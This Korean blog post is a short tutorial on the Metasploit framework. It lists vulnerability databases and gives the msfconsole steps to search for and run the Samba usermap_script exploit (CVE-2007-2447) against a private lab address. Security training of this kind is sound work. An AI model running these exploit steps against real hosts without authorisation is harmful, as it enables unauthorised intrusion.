본문 바로가기
IT Tech/Tools

Metasploit 사용

by _><- 2024. 12. 24.
반응형

Rapid7 사에서 운영하는 오픈소스 취약점 테스트 소프트웨어 프레임워크


https://taesam.tistory.com/28


취약점 확인
-
http://www.exploit-db.com

OffSec’s Exploit Database Archive

www.exploit-db.com

https://cve.mitre.org

CVE - CVE

The mission of the CVE® Program is to identify, define, and catalog publicly disclosed cybersecurity vulnerabilities.

cve.mitre.org

https://www.rapid7.com


Exploit 해보기
- 칼리 리눅스의 metasploit framework를 이용하기 위해 다음 명령어 실행

(명령어) msfconsole

공격모듈 검색
(명령어) search CVE-2007-2447

use 명령어로 스크립트 장착 확인
(명령어) use exploit/multi/samba/usermap_script

info 명령어로 필요한 옵션 확인
show options명령어로 옵션 확인

set 명령어로 옵션 설정 후 공격진행
(명령어) set Rhosts 192.168.79.2
(명령어) exploit


AWS에서 Metasploit 설치하기

https://blog.naver.com/chogar/80164849517

AWS에 Metasploit 운영

※ 주의사항 아래 공격 코드는 연구 목적으로 작성된 것이며, 허가 받지 않은 공간에서는 테스트를 절대 금...

blog.naver.com


https://docs.rapid7.com/metasploit/installing-metasploit-pro

Installing Metasploit Pro | Metasploit Documentation

docs.rapid7.com



반응형

'IT Tech > Tools' 카테고리의 다른 글

syslog로 로그를 쏘는 방법 : beats툴 활용  (1) 2024.12.05
APM Tool : 미들웨어 모니터링, Jennifer, Scouter(오픈소스), cloudwatch(AWS)  (2) 2024.11.29
딥스캔 , Deepscan : Code Inspection 툴  (1) 2024.11.13
소나큐브, sonarqube  (3) 2024.11.13
PC HDD 완전포멧  (4) 2024.11.06

관련글

티스토리툴바